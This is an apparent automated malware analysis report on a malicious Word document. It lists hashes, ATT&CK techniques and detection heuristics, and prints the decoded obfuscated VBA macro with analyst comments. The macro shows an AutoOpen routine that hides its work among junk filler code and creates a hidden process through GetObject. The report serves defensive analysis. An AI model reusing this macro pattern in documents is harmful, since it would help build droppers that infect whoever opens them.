Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7d7587e2691d50f7…

MALICIOUS

Office (OLE)

159.0 KB · Created: 2019-03-21 07:35:00 · Authoring application: Microsoft Office Word · First seen: 2021-09-17
MD5: 0abc08834a2f282e817e3f44671f1c49 SHA-1: af45f0fea5b2da1397c04c8fc1bde9c8c03f5d70 SHA-256: 7d7587e2691d50f7fe9198d77fde82f47746ab0953a1e8b05eb8b9c321deaf0b
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is a Microsoft Office document containing VBA macros, including an AutoOpen macro, a common technique for initial execution. The GetObject call and the obfuscated VBA p-code suggest an attempt to execute arbitrary code. The ClamAV detection 'Doc.Malware.Dsau-6904244-0' further confirms the malicious classification. The script's complexity and obfuscation indicate that it likely downloads and executes a second-stage payload.

Heuristics 6

  • ClamAV: Doc.Malware.Dsau-6904244-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Dsau-6904244-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This rule catches documents that carry p-code only, or whose source could not be extracted, so that no visible source is available.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename  Kind  Source  Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13054 bytes
SHA-256: 3700389b011b58bab8b1fab559c8f0f58460c3c27256f6aabb45c2b37f3814d2
Preview script
First 1,000 lines of the extracted script
' Decoded VBA source (olevba output) for three modules. The Attribute lines are
' module metadata emitted with the export, not executable statements.
' Module ZDGQBc: VB_Base names Normal.ThisDocument, so this appears to be the
' document module; no procedures from it are shown in this preview.
Attribute VB_Name = "ZDGQBc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Module sAxoAx: VB_Base is a pair of GUIDs and VB_Exposed is False. The autoopen
' procedure below reads several sAxoAx.<member> values whose definitions are not
' included in this preview — presumably a form or class module holding the real
' strings; confirm against the full extraction.
Attribute VB_Name = "sAxoAx"
Attribute VB_Base = "0{B00C1D2A-0EC5-4834-BD52-55DCDDDB556B}{E8DB5D3B-4C2A-40DF-A84C-3A33A884B904}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

' Module WDBBAQA: holds the autoopen procedure.
Attribute VB_Name = "WDBBAQA"
' Entry point: a procedure named autoopen runs when the document is opened
' (report heuristic OLE_VBA_AUTOOPEN). Reading aid for this listing: the body is a
' run of near-identical If blocks whose only effect is assigning to variables that
' are never read again, interleaved with three statements that do real work
' (marked "Live" below). Identifier names throughout look randomly generated.
Sub autoopen()
' Every runtime error for the rest of the procedure is skipped silently, so a
' failing filler expression or a failed object call does not stop execution.
On Error Resume Next
' Filler block: SGAQDA and O1U_A4G are not assigned anywhere in the visible source,
' and the three results below are never read again. The same shape repeats
' throughout the procedure with fresh names and constants.
   If SGAQDA = O1U_A4G Then
   XQBBXB = (354164903)
   Rkxc1cAD = (uAXZcA_B * Log(185537904 + Atn(90458249 * ZUAAUw_)) + XBwAAA1c + CDbl(PAcGXA - Sqr(UUxABAoA / CBool(619123844 / 648437584) + GoAo_wc - Rnd(lXBQcwAZ))) * 717692923 * 140857080)
   SD_A1A = (876277793)
End If
   If joxXB_A = zw1kAo Then
   ABCBXAAU = (907333972)
   kDDwxZ = (Dw1A1U * Log(906077285 + Atn(939496631 * ABGwAUA)) + Z4DQCDAw + CDbl(wA4A4xA - Sqr(jA11_x / CBool(904290008 / 247771865) + Qc4AA4A - Rnd(TUwAkDZ))) * 104070901 * 407975498)
   K1GQ4A = (208115342)
End If
   If vAkDw4_ = YXAXAx Then
   w1DAAAk = (911857544)
   V_1AAA_ = (iQAwZUU * Log(699515691 + Atn(578272690 * fCwUAZQQ)) + A_AXDQQA + CDbl(lBAUAXAB - Sqr(jQAAA_ / CBool(234002449 / 875593952) + GG_BGDDx - Rnd(joUoAQAQ))) * 484803153 * 720327324)
   WZX_1x = (386064342)
End If
' Live: obtains an object through GetObject (report heuristic OLE_VBA_GETOBJ). The
' moniker string is concatenated from two identifiers not assigned in this listing
' and a member of the sAxoAx module, so its value cannot be read from this source
' alone. The returned object is kept in awcDAXDw and used twice further down.
Set awcDAXDw = GetObject(ExAADAAB + sAxoAx.E4w_Ak + GZUAB1)
   If zDBAxA = i1AAAxAw Then
   BB4ZcQ = (370313042)
   wxABAAZ = (BoUABGQA * Log(312109724 + Atn(756444821 * wB_xAB)) + UAADAAB + CDbl(TBGwAXX - Sqr(NAABw4A / CBool(175736737 / 990808190) + s41xDA - Rnd(SAABBU))) * 930200640 * 173715715)
   iD1AA4 = (573405040)
End If
   If howAUx = tcBQA1 Then
   JUD1Ux4A = (587887753)
   rCU_ZB = (cUQG4AZZ * Log(697222529 + Atn(285234511 * EAAZADo)) + PBAAcCD + CDbl(EAC4BQU - Sqr(LAZoD1x / CBool(942634415 / 929334407) + KACAAAAA - Rnd(EAxXXUA))) * 480444825 * 68796775)
   K4GBAU = (230801638)
End If
   If KAxAGDA4 = LDXCAk Then
   zkBAoGcA = (543619911)
   vQABAB = (LZQA1AC_ * Log(55987397 + Atn(23136848 * YCA_AX)) + R1ABw_ + CDbl(uZADAwD - Sqr(UAQAwA / CBool(730719312 / 839687655) + z4BACZC - Rnd(iAZAA_BB))) * 984468410 * 611468616)
   dcAAC4 = (239226092)
End If
' Live: sets the ShowWindow property of the object obtained above to 0
' (711727 - 711727). What the property controls depends on which object
' the moniker resolved to — confirm with dynamic analysis.
awcDAXDw.ShowWindow = 711727 - 711727
   If zQAwQXA = QBc4C_A Then
   kADBAAA = (450440259)
   nAwDBcU = (sAUwAw * Log(473041508 + Atn(688292563 * jAZoGAU)) + a1DD__ + CDbl(FQk4AAA - Sqr(OBA4AC4A / CBool(49112116 / 526349501) + bC_QQAc - Rnd(wQAoDAU))) * 20994649 * 425511610)
   uQBQ_QU = (364955007)
End If
   If XQQUAw = CUAwow Then
   VAokkBw = (919364621)
   OGCQDA = (wA_4ZDk * Log(6426374 + Atn(849015688 * TAA4QDA)) + u4QBBA + CDbl(NQAwwD1X - Sqr(GQxkcAZA / CBool(37212185 / 126409053) + WAxGAA4 - Rnd(tUDAAc))) * 179336256 * 152281553)
   UD1QD1Q4 = (646481162)
End If
' Live: a second GetObject with another concatenated moniker, followed by a call to
' its Create method (two physical lines joined by the " _" continuation). The first
' argument is assembled from four sAxoAx members plus unassigned identifiers, and
' awcDAXDw from above is passed as the third argument. This is the object-execution
' token behind OLE_VBA_PCODE_AUTOEXEC_EXEC; the concrete strings are only
' recoverable from the sAxoAx module. The "@" after Create is as emitted by the
' decoder — treat it as a decoding artifact until confirmed.
GetObject(wwcBBGA + sAxoAx.cDDAAAxB + HwQAD4UA). _
Create@ pACA_A + sAxoAx.NBwA1D + QcAAADBB + sAxoAx.Z4AkAkZ + pDAXUowA + sAxoAx.wkUQUBZA + YoB1D1_, QZAAAZAQ, awcDAXDw, WAwGAAA_
   If wACxAUQ = HcBDQA Then
   mGAU4Ac_ = (648909886)
   sD4xBUAC = (a4ADAUk * Log(380977896 + Atn(920961872 * YAGCAA)) + wQZUCAA + CDbl(zUBcCAwD - Sqr(oxBDAxQ / CBool(388970675 / 942189567) + WG4AxD - Rnd(ZAGoAUwA))) * 60028052 * 537514096)
   sAkQZA_ = (777214553)
End If
   If IAxUDAB = nGBAGw Then
   SAABAo4 = (613193940)
   sXAAwUAo = (LAU4xC4w * Log(69644910 + Atn(179403780 * ZCCG1Ak)) + EAAACcD + CDbl(EQAQAwwA - Sqr(NUQAAA / CBool(682560908 / 94327741) + VAAx1AU - Rnd(DcAQwDQD))) * 958521476 * 626994569)
   NDAAxQU = (677554219)
End If
   If qZDDDA = I4D4cCA Then
   sUo1CXAQ = (284786612)
   QG4UoC = (lDwACQAo * Log(537229880 + Atn(964221077 * jXAZDoco)) + cQDUkZxG + CDbl(cDAAAQ - Sqr(KAUBAoQ / CBool(117643941 / 936060523) + wCQQBA - Rnd(LAABBww))) * 148071599 * 533879942)
   sACZGcA = (967372682)
End If
End Sub


' Processing file: /opt/analyzer/scan_staging/68e0704921e141ccb8
... (truncated)